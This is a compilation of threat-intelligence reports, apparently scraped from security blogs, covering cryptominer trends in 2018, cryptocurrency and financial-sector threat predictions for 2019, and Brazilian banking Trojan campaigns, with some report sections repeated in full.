Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all was detected in India (23.7%), Russia (18.45%), and Kazakhstan (14.38%), but some cases were also logged in Asia, Africa, and Europe (Britain, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark, Sweden), as well as the US, Canada, and Japan.

Share of users impacted by Bitcoin miners on removable drives, 2018. Source: KSN (includes only countries with more than 10,000 Kaspersky Lab clients) (download)

Conclusion

Summing up the past year, we can highlight the following bullet points:

  1. Given the growing value and popularity of cryptocurrencies, cybercriminals are investing resources in the development of new mining technologies, which, according to our data, are gradually replacing ransomware Trojans.
  2. Hidden mining activity declines when cryptocurrency prices fall.
  3. The spread of hidden mining is not impacted by factors such as domestic legislative control or cost of electricity.
  4. Miners often get on victims’ computers during the download of unlicensed content or installation of pirated software. As a consequence, this type of threat is most prevalent in countries with poor regulation of the unlicensed software market, as well a low level of overall digital literacy among users.

Kaspersky Security Bulletin 2018. Story of the year: miners” (English, PDF)

Securelist: Kaspersky Security Bulletin 2018. Story of the year: miners

Cryptocurrency miners that infect the computers of unsuspecting users essentially operate according to the same business model as ransomware programs: the victim’s computing power is harnessed to enrich the cybercriminals. Only in the case of miners, it might be quite a while before the user notices that 70–80% of their CPU or graphics card power is being used to generate virtual coins. Encrypted documents and ransomware messages are far harder to miss.

Cryptominers usually find their way onto user computers and corporate machines along with adware, hacked games, and other pirated content. What’s more, the present “entry threshold” — that is, the actual process of creating a miner — is rather low: cybercriminals are assisted by ready-to-use affiliate programs, open mining pools, and miner builders. If that weren’t enough, there is another way to steal computing resources through a webpage-embedded mining script that starts when the user opens the site in a browser.  A separate category of cybercriminals are those who target not private computers, but the servers of large companies, for which the infection process is considerably more resource-intense.

2018 began with a rise in the number of miner-related attacks. However, after a drop in the value of the main cryptocurrencies, which lasted from January to February, infection activity noticeably declined. General interest in cryptocurrencies also waned.  Yet the graph clearly shows that while the number of cryptominer attacks decreased, the threat is still current. As for how the November collapse in the Bitcoin exchange rate will affect the number of infections, time will tell.

&&

Number of unique users attacked by miners in Q1–Q3 2018 (download)

Hidden mining software was very popular among botnet owners, as confirmed by our statistics on files downloaded by zombie networks: Q1 2018 saw a boom in cryptominers, and the share of this malware in the first half of the year was 4.6% of the total number of files downloaded by botnets. For comparison, in Q2 2017 this figure was 2.9%. It follows from the data that cybercriminals have come to view botnets as a means of spreading software for mining cryptocurrencies.

H2 2017 H1 2017
1 Lethic 17.0% njRAT 5.2%
2 Neutrino.POS 4.6% Lethic 5.0%
3 njRAT 3.7% Khalesi 4.9%
4 Emotet 3.5% Miners 4.6%
5 Miners 2.9% Neutrino.POS 2.2%
6 Smoke 1.8% Edur 1.3%
7 Cutwail 0.7% PassView 1.3%
8 Ransomware 0.7% Jimmy 1.1%
9 SpyEye 0.5% Gandcrab 1.1%
10 Snojan 0.3% Cutwail 1.1%

Most downloaded threats, H2 2017–H1 2018

Still on the topic of botnets, it is impossible not to mention that in Q3 2018 we registered a decline in the number of DDoS attacks, the most likely reason being, according to our experts, the “reprofiling” of botnets from DDoS attacks to cryptocurrency mining. This was induced not only by the high popularity of cryptocurrencies, but also the high competition in the “DDoS market”, which made the attacks less expensive for clients, but not for the botnetters themselves, who still have to cope with more than a few less-than-legal “organizational issues.”

Mining differs favorably for cybercriminals in that, if executed properly, it can be impossible for the owner of an infected machine to detect, and thus the chances of encountering the cyberpolice are far lower. And the reprofiling of existing server capacity completely hides its owner from the eyes of the law. Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining.  For example, the DDoS activity of the Yoyo botnet dropped dramatically, although there is no data about it being dismantled.

Moreover, mining has started to command as much (or more) attention as ransomware: this year we encountered several examples of reprofiled malware with added functionality for cryptocurrency mining. And the techniques used by the creators of miners have become more sophisticated.

For instance, an interesting miner implementation, which we dubbed PowerGhost, caught our eye in July this year. The malware can stealthily establish itself in the system and spread inside large corporate networks, infecting workstations and servers alike. To go unnoticed by users and security solutions for as long as possible, the miner employs various fileless techniques. Infection occurs remotely using exploits or remote management tools (Windows Management Instrumentation), and involves running a single-line powershell script that downloads the main body of the malware and immediately starts it without writing to the hard drive.

Another example of reprofiling is the ransomware Trojan Trojan-Ransom.Win32.Rakhni, the first samples of which were detected by Kaspersky Lab back in 2013. Its mining functions are a 2018 innovation. At the same time, their activation depends on whether the folder %AppData%\Bitcoin is present on the infected machine. If it exists, the loader downloads the ransomware. If there is no such folder and, in addition, the computer has more than two logical processors, a miner is downloaded. To keep the malware hidden in the system, the developers made it look like an Adobe product. This can be seen by the icon and the name of the executable file, as well as the fake digital signature, which uses Adobe Systems Incorporated as the company name.

Another piece of malware that has learned how to seed computers with mining utilities is the previously adware-only PBot. The malware spreads through affiliate sites that inject scripts into their pages for redirecting users to sponsored links. The standard distribution scheme looks as follows:

  1. The user visits one of the sites in the affiliate network.
  2. Clicking anywhere on the page causes a new browser window to appear, where an intermediate link opens.
  3. The link directs the user to the PBot download page, which is tasked with downloading and running the malware by deceptive means.

The most common coin among all illegally mined cryptocurrencies is Monero (xmr). This is due to its anonymous algorithm, relatively high market value, and ease of sale, since it is accepted by most major cryptocurrency exchanges. For botnets mining this coin illegally, it is important that CPU resources can be utilized. By some accounts, a total of $175 million has been mined illegally, representing around 5% of all Monero currently in circulation.

Factors affecting the distribution of miners

The conclusion based on data we obtained from various sources is that legislative control over cryptocurrencies has little impact on the spread of hidden mining. For example, in Algeria and Vietnam cryptocurrencies are either prohibited or severely restricted under domestic law. Yet Vietnam is third in the ranking of leading countries by number of miner attacks, and Algeria is sixth. Meanwhile, Iran, which is presently drafting legislation to govern cryptocurrency and developing plans to issue its own “coins,” is in seventh place.

Country Cryptocurrency status % of attacks
Kazakhstan Not prohibited, Not legalized 16.75%
Vietnam Issuance (mining) prohibited 13.00%
Indonesia Recognized as an exchange commodity 12.87%
Ukraine Circulation governed by law 11.19%
Russia Legislation under consideration 10.71%
Algeria Prohibited 9.03%
Iran Legislation in preparation, creation of own cryptocurrency planned 7.21%
India Ban under consideration, hearings in progress 7.20%
Thailand Circulation governed by law 6.76%
Taiwan Not prohibited 5.81%

Top 10 countries by share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients)

At the other end of the scale, US users were the least affected by cryptominters (1.33% of the total number of attacks), followed by users in Switzerland (1.56%) and Britain (1.66%).

&&

Map representing countries with the lowest share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients) (download)

The prevalence of miners is not impacted by the cost of electricity, which varies greatly from country to country. Again, this factor is not a consideration for cybercriminals as they exploit third-party resources.

Distribution methods

Looking at the distribution of pirated software in countries with the highest number of miner attacks, one sees a clear correlation: the more freely unlicensed software is distributed, the more miners there are. This is confirmed by our statistics, which indicates that miners most often land on victim computers together with pirated software.

Another penetration vector for miners is adware installers distributed using social engineering. More sophisticated options (for example, propagation through vulnerabilities such as EternalBlue) are aimed at server capacities and are less frequently encountered.

And it should not be forgotten that USB drives have been used to distribute cryptocurrency mining software since at least 2015. The percentage of detections of the popular Bitcoin miner Trojan.Win64.Miner.all on removable devices is growing annually by about one-sixth. In 2018, one in ten users affected by malware transmitted through flash drives was the victim of this particular miner (roughly 9.22%; for comparison, in 2017 it was 6.7%, and in 2016 4.2%).

&&

Millions of unique users found to have malware in the root directory, which is the main sign of infection via removable drives, 2013–2018. Source: KSN (download)

Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all was detected in India (23.7%), Russia (18.45%), and Kazakhstan (14.38%), but some cases were also logged in Asia, Africa, and Europe (Britain, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark, Sweden), as well as the US, Canada, and Japan.

&&

Share of users impacted by Bitcoin miners on removable drives, 2018. Source: KSN (includes only countries with more than 10,000 Kaspersky Lab clients) (download)

Conclusion

Summing up the past year, we can highlight the following bullet points:

  1. Given the growing value and popularity of cryptocurrencies, cybercriminals are investing resources in the development of new mining technologies, which, according to our data, are gradually replacing ransomware Trojans.
  2. Hidden mining activity declines when cryptocurrency prices fall.
  3. The spread of hidden mining is not impacted by factors such as domestic legislative control or cost of electricity.
  4. Miners often get on victims’ computers during the download of unlicensed content or installation of pirated software. As a consequence, this type of threat is most prevalent in countries with poor regulation of the unlicensed software market, as well a low level of overall digital literacy among users.

Kaspersky Security Bulletin 2018. Story of the year: miners” (English, PDF)



Securelist

Cryptocurrency threat predictions for 2019

Introduction – key events in 2018

2018 saw cryptocurrency become an established part of many people’s lives, and a more attractive target for cybercriminals across the world. To some extent, the malicious mining of cryptocurrencies even prevailed over the main threat of the last few years: ransomware.

However, in the second half of 2018, the blockchain and cryptocurrency industry faced a major development: falling prices for cryptocurrencies. The impact was felt across the landscape, with rapid decline in public interest, the activity of the crypto community and traders, and in the related activity of cybercriminals.

While this will certainly affect our forecasts for 2019, let’s see how the forecasts we made for this year worked out.

1. ‘Ransomware attacks will force users to buy cryptocurrency’

This prediction turned out to be partially true. In 2018, we saw a decline in the popularity of encryptors, combined with a rise in the malicious use of cryptocurrency miners. It transpired that it is safer for attackers to perform discreet mining on infected devices than to demand a ransom and attract attention. However, it is too early to dismiss ransomware as a major threat; it is still an effective method of infection and monetization of both individuals and organizations – and cryptocurrencies remain a more easily anonymized form of ransom payment.

2. ‘We will see targeted attacks with malicious miners’

This prediction did not come true. We observed mainly isolated incidents where miners were maliciously installed in an infected corporate network. There are several reasons for that:

  • Companies have learned to detect miners that are run on the computers of employees/administrators; both those installed by users themselves and by third parties without the knowledge of the user.
  • The attackers themselves do not appear to consider this a promising approach. Targeted and sophisticated attacks are more about gaining persistence in the network for the purpose of espionage or the theft of money or data. It is therefore better not to attract attention by crypto-mining.

3. ‘The rise of miners will continue and involve new actors’

This prediction also turned out to be partially true: the malicious use of cryptocurrency miners actively increased during the first quarter of 2018, peaking in March. Over the following months there was a gradual decrease in activity due to the drop in price for cryptocurrencies.

4. ‘There will be more web-mining’

Again, this prediction turned out to be partially true. The web mining of cryptocurrencies reached a peak in January 2018, after which it began to decline. Webmasters, hoping to use web mining as an alternative means of website monetization alongside advertising, did not usually notify users about any hidden mining taking place on their sites. This meant that web mining quickly became associated with malicious activity. After that, it was difficult to restore its reputation.

5. ‘The fall of ICOs (Initial Coin Offering)’

Yes and no. On the one hand, collecting money with the help of ICOs continued: projects became larger and the fees did not fall. On the other hand, many projects that collected impressive amounts through ICOs in 2017 were not be able to create the promised product in time during 2018, which inevitably affected the exchange price of the sold tokens.

Top three predictions for 2019

1. Excessive expectations about the use of blockchain beyond the cryptocurrency sphere will disappear

In the end, we expect this trend to be driven by people rather than the technology’s capability, as organizations and industries come to the conclusion that blockchain has a rather narrow scope of application, and most attempts to use in different ways are not justified. The reliable application of blockchain beyond cryptocurrency has been explored and experimented with for years, but there is little evidence of achievement. We expect 2019 to be the year people stop trying.

2. Cryptocurrencies as a means of payment will decline further

In 2017 a number of suppliers of goods and services announced that they would accept cryptocurrencies as a form of payment. However, in the face of huge commissions (an acute problem in December 2017), slow transfers, a large price for integration, and, most importantly, a small number of customers, its use as a method of payment declined steadily. In the end, the use of cryptocurrencies by a legitimate business simply does not make much sense.

3. There will be no return to 2017’s sky-high exchange rates

Until January 2018, there were immense highs and lows in the price of Bitcoin. But we do not expect these to return as the value of cryptocurrencies levels out to reflect their popularity. We believe there is a finite audience for whom cryptocurrencies are of interest, and once that limit is reached the price will not rise further.

 “Cryptocurrency threat predictions for 2019” (PDF)

Securelist: Cryptocurrency threat predictions for 2019

Introduction – key events in 2018

2018 saw cryptocurrency become an established part of many people’s lives, and a more attractive target for cybercriminals across the world. To some extent, the malicious mining of cryptocurrencies even prevailed over the main threat of the last few years: ransomware.

However, in the second half of 2018, the blockchain and cryptocurrency industry faced a major development: falling prices for cryptocurrencies. The impact was felt across the landscape, with rapid decline in public interest, the activity of the crypto community and traders, and in the related activity of cybercriminals.

While this will certainly affect our forecasts for 2019, let’s see how the forecasts we made for this year worked out.

1. ‘Ransomware attacks will force users to buy cryptocurrency’

This prediction turned out to be partially true. In 2018, we saw a decline in the popularity of encryptors, combined with a rise in the malicious use of cryptocurrency miners. It transpired that it is safer for attackers to perform discreet mining on infected devices than to demand a ransom and attract attention. However, it is too early to dismiss ransomware as a major threat; it is still an effective method of infection and monetization of both individuals and organizations – and cryptocurrencies remain a more easily anonymized form of ransom payment.

2. ‘We will see targeted attacks with malicious miners’

This prediction did not come true. We observed mainly isolated incidents where miners were maliciously installed in an infected corporate network. There are several reasons for that:

  • Companies have learned to detect miners that are run on the computers of employees/administrators; both those installed by users themselves and by third parties without the knowledge of the user.
  • The attackers themselves do not appear to consider this a promising approach. Targeted and sophisticated attacks are more about gaining persistence in the network for the purpose of espionage or the theft of money or data. It is therefore better not to attract attention by crypto-mining.

3. ‘The rise of miners will continue and involve new actors’

This prediction also turned out to be partially true: the malicious use of cryptocurrency miners actively increased during the first quarter of 2018, peaking in March. Over the following months there was a gradual decrease in activity due to the drop in price for cryptocurrencies.

4. ‘There will be more web-mining’

Again, this prediction turned out to be partially true. The web mining of cryptocurrencies reached a peak in January 2018, after which it began to decline. Webmasters, hoping to use web mining as an alternative means of website monetization alongside advertising, did not usually notify users about any hidden mining taking place on their sites. This meant that web mining quickly became associated with malicious activity. After that, it was difficult to restore its reputation.

5. ‘The fall of ICOs (Initial Coin Offering)’

Yes and no. On the one hand, collecting money with the help of ICOs continued: projects became larger and the fees did not fall. On the other hand, many projects that collected impressive amounts through ICOs in 2017 were not be able to create the promised product in time during 2018, which inevitably affected the exchange price of the sold tokens.

Top three predictions for 2019

1. Excessive expectations about the use of blockchain beyond the cryptocurrency sphere will disappear

In the end, we expect this trend to be driven by people rather than the technology’s capability, as organizations and industries come to the conclusion that blockchain has a rather narrow scope of application, and most attempts to use in different ways are not justified. The reliable application of blockchain beyond cryptocurrency has been explored and experimented with for years, but there is little evidence of achievement. We expect 2019 to be the year people stop trying.

2. Cryptocurrencies as a means of payment will decline further

In 2017 a number of suppliers of goods and services announced that they would accept cryptocurrencies as a form of payment. However, in the face of huge commissions (an acute problem in December 2017), slow transfers, a large price for integration, and, most importantly, a small number of customers, its use as a method of payment declined steadily. In the end, the use of cryptocurrencies by a legitimate business simply does not make much sense.

3. There will be no return to 2017’s sky-high exchange rates

Until January 2018, there were immense highs and lows in the price of Bitcoin. But we do not expect these to return as the value of cryptocurrencies levels out to reflect their popularity. We believe there is a finite audience for whom cryptocurrencies are of interest, and once that limit is reached the price will not rise further.

 “Cryptocurrency threat predictions for 2019” (PDF)



Securelist

Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbnal and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Win7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to high amount of data leakages previous years this type of attacks becomes more effective, since criminals are able to use leaked internal information about targeted organization to make their messages look absolutely legit. Main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results and will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)

Securelist: Cyberthreats to financial institutions 2019: overview and predictions

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.

Predictions for 2019

  • The emergence of new groups due to the fragmentation of Cobalt/Carbnal and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Win7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

The activity of cybercriminals in these regions is constantly growing: the immaturity of protective solutions in the financial sector and the rapid spread of various electronic means of payment among the population and companies in these regions are contributing to this. Now, all the prerequisites exist for the emergence of a new center for financial threats in Asia, in addition to the three already in Latin America, Korean peninsula and the ex-USSR.

  • Continuation of the supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world

This trend will remain with us in 2019. Attacks on software providers have proven effective and allowed attackers to gain access to several major targets. Small companies (that supply specialized financial services for the larger players) will be jeopardized first, such as the suppliers of money transfer systems, banks and exchanges.

  • Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of PoS attacks with attacks on systems accepting online payments

Next year, in terms of threats to ordinary users and stores, those who use cards without chips and do not use two-factor authorization of transactions will be the most at risk. The malicious community has focused on some simple goals that are easy to monetize. However, this does not mean that they do not use any complex techniques. For example, to bypass anti-fraud systems, they copy all computer and browser system settings. On the other hand, this cybercriminal behavior will mean that the number of attacks on PoS terminals will decrease, and they will move towards attacks on online payment platforms instead.

  • The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network

Due to the lack of physical security and the lack of control over connected devices in many networks, cybercriminals will more actively exploit situations where a computer or mini-board can be installed, specifically configured to steal data from the network and transfer the information using 4G/LTE modems.

Attacks like this will provide cybergangs with an opportunity to access various data, including information about the customers of financial institutions, as well as the network infrastructure of financial institutions.

  • Attacks on mobile banking for business users

Mobile applications for business are gaining popularity, which is likely to lead to the first attacks on their users. There are enough tools for this, and the possible losses that businesses incur are much higher than the losses incurred when individuals are attacked. The most likely attack vectors are attacks at the Web API level and through the supply chain.

  • Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wires: result of data leaks

Social engineering is particularly popular in some regions, for example Latin America. Cybercriminals keep targeting specific people in companies and financial institutions to make them wire big sums of money. Due to high amount of data leakages previous years this type of attacks becomes more effective, since criminals are able to use leaked internal information about targeted organization to make their messages look absolutely legit. Main idea remains the same: they make these targets believe that the financial request has come from business partners or directors. These techniques use zero malware, but demonstrate how targeted social engineering gets results and will become more powerful in 2019. This includes attacks like “simswap”.

 “Cyberthreats to financial institutions 2019: overview and predictions” (PDF)



Securelist

Two Attack Campaigns Infect Brazilian Financial Institution Customers With Banking Trojans

Security researchers identified two malware distribution campaigns that infect customers of Brazilian financial institutions with banking Trojans.

While Cisco Talos observed that the two ongoing malware campaigns use different file types for the initial download stage and infection process, they also noticed some similarities between the two campaigns.

For instance, both campaigns abuse link-shortening services to disguise their distribution methods and employ the same naming convention for files used during the infection process. Researchers also traced both of the operations back to an email generation tool hosted in an Amazon S3 bucket, which they believe attackers are using to create a botnet.

Cisco Talos determined that the ultimate purpose of the campaigns is to deliver one of two banking Trojans to Brazilian financial institutions. Both of the final payloads exfiltrate data to a command-and-control (C&C) server and come equipped with a keylogger. However, while one Trojan attempts to steal customers’ payment card security codes, the other targets two-factor authentication (2FA) codes.

A Surge in Banking Trojans

News of these campaigns comes amid a surge in banking Trojan activity across a variety of platforms. In the second quarter of 2018, Kaspersky Lab detected 61,045 installation packages for mobile banking Trojans. That number was more than triple the amount observed in Q1 of 2018, and it far surpassed the totals observed over the previous year.

This growth continued through the summer. In August, Check Point noted that attackers had doubled their use of banking Trojans over the previous two months. In particular, researchers tracked increased activity for the Ramnit banking Trojan, a threat that rose to sixth place on Check Point’s August 2018 “Most Wanted Malware” list.

How to Protect Your Organization From Financial Cyberthreats

Security professionals can help defend against campaigns distributing banking Trojans by using endpoint security solutions designed to protect against fraud techniques. In addition, security teams can challenge the spam botnets used to deliver these threats by enabling email filtering and similar protections on corporate systems.

Sources: Cisco Talos, Kaspersky Lab, Check Point

The post Two Attack Campaigns Infect Brazilian Financial Institution Customers With Banking Trojans appeared first on Security Intelligence.

Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape

Financial cybercrime in Brazil is known as one of the most geospecific panoramas, where local cybercriminals attack local internet users. With close to 210 million residents in the country, criminals are in lavish turf. Some reports cite losses of nearly 70 billion Brazilian reals — which equates to about $18.6 billion — to fraud and online scams in 2017.

In following the evolution of cyber activity in Brazil, IBM Security sees this threat landscape as unique, where technical sophistication is neither the norm nor a requirement. In this first article of a two-part series, we expose some of our recent research on the typical malware and tactics, techniques and procedures (TTPs) used against Brazilian online banking users.

In contrast to rising sophistication in other parts of the globe, one of the most poignant characteristics of cybercrime in Brazil is its simplicity. Attackers will often use their familiarity with how local users browse the internet to take advantage of them and steal their money.

Internet Access Spreads Far and Wide in Brazil, But User Education Is Still Scarce

The majority of global internet users are located in East and South Asia, and China is the largest online market in the world. Fourth on the global chart, Brazil is the largest internet market in Latin America, with nearly 140 million internet users as of 2016, according to Statista.

Internet access has grown rapidly in Brazil in the past decade, with nearly 77 percent of residents accessing the internet from home in some of the more populated regions of the country.

Brazil malware landscape

Figure 1: A regional estimate of the percentage of homes with internet access in Brazil (Source: The Brazilian Institute of Geography and Statistics)

However, while more Brazilians than ever before have access to internet-enabled services, many users are still not well-versed in using them safely. Regardless of the browser or search engine, it’s not unusual for internet users to look up something they want to access and click the first result without thinking twice about it. When it comes to online banking, for example, some may not take the time to type their bank’s URL into the address bar and favor searching for it, then browsing to the top result they get back. Fraudsters rely on this behavior and serve up poisoned links as the top results on a search engine to trap those who are unaware of the risks.

When the Going Gets Tough…Become a Cybercriminal?

The drivers of crime in Brazil stem from socio-economic difficulty. In addition, laws are either nonexistent or not strict enough to deter people from becoming online thieves.

